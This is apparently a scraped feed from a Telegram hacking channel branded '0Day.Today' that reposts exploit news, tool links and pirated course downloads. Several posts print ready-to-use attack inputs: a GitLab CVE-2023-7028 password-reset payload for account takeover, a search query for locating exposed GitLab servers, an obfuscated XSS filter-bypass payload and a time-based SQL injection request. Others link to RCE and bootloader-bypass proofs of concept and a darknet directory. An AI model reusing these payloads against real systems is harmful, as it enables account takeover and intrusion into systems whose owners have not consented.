Udemy - Bug Bounty Hunting Guide to an Advanced Earning Method
Download
#Download
————
0Day.Today
@LearnExploit
@Tech_Army
Download
#Download
————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥5❤3👍1
Cyber Security Courses, Training, Certifications and Resources
The SANS Promise: Everyone who completes SANS training can apply the skills and knowledge they’ve learned the day they return to work.
#Sans #Courses
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥9🔥3⚡1
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions
Poc:
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
Poc:
user[email][]=valid@email.com&user[email][]=attacker@email.com
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
🆒6❤3👎1
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com #CVE #POC ———— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions
Hunter query: `product.name="Gitlab"`
Hunter
#hunter
————
0Day.Today
@LearnExploit
@Tech_Army
Hunter query: `product.name="Gitlab"`
Hunter
#hunter
————
0Day.Today
@LearnExploit
@Tech_Army
👍7
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com #CVE #POC ———— 0Day.Today @LearnExploit @Tech_Army
GitHub
GitHub - Vozec/CVE-2023-7028: This repository presents a proof-of-concept of CVE-2023-7028
This repository presents a proof-of-concept of CVE-2023-7028 - Vozec/CVE-2023-7028
❤🔥4❤2👎1
Moriarty - Moriarty scans for a variety of CVEs and vulnerabilities
Github
#CVE #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - BC-SECURITY/Moriarty: Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential…
Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential exploits for Privilege Escalation in Windows environments. - GitHub - BC-SECURITY/Moriarty: Mor...
⚡4🆒2
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥3❤1⚡1
XSS payload with Alert Obfuscation, for bypass RegEx filters⚡️
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<img src="X" onerror=top[8680439..toString(30)](1337)>
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡2👍2
This media is not supported in your browser
VIEW IN TELEGRAM
Run Script with Python 2.7
python -m pip install requests
python -m pip install bs4
python -m pip install colorama
python -m pip install lxml
@LearnExploit
#Exploit #Tools
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡16❤🔥2👍2🔥2👎1
CVE-2023-26360 - Unauthenticated RCE in Adobe Coldfusion
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management
Unauthenticated RCE in Adobe Coldfusion – CVE-2023-26360
Overview CVE-2023-263060 was exploited in the wild in Adobe ColdFusion product, a commercial application server for rapid web application development. The vulnerability affects both the 2018 and...
Xiaomi HyperOS BootLoader Bypass - A PoC that exploits a vulnerability to bypass the Xiaomi HyperOS community restrictions of BootLoader unlocked account bindings
Github
#android
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#android
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - MlgmXyysd/Xiaomi-HyperOS-BootLoader-Bypass: A PoC that exploits a vulnerability to bypass the Xiaomi HyperOS community…
A PoC that exploits a vulnerability to bypass the Xiaomi HyperOS community restrictions of BootLoader unlocked account bindings. - MlgmXyysd/Xiaomi-HyperOS-BootLoader-Bypass
🆒5❤🔥1👎1
vless://d88cb128-8dcb-4216-b121-82a901c2ede2@s.thisisforu.sbs:43978?type=tcp&security=none#GR_SV5_MCI_MTN-%40LearnExploit
دویست گیگ داره
دونیت کنین بیشترش میکنم🔥
TRX:
TJqtCmgFUYkptcvzDuW8c4JRQNm5zpUwPA
#v2ray #config
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9❤🔥5
3am
Sajad Shahi
💔4👍1👎1
❤🔥2⚡1🔥1
MITRE Caldera - Automated Adversary Emulation Platform
Github
#RedTeam #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#RedTeam #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥6🆒1
SQL Injection
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
GET
/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/Folder/
HTTP/1.1
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡7
This media is not supported in your browser
VIEW IN TELEGRAM
Fuzzing and Bypassing the AWS WAF
Github
Read Here
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
Read Here
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3⚡2🔥1
tor.taxi - your ride to the darknet
.onion Link
#Darkweb #Tor
——————
0Day.Today
@LearnExploit
@Tech_Army
.onion Link
#Darkweb #Tor
——————
0Day.Today
@LearnExploit
@Tech_Army
❤1✍1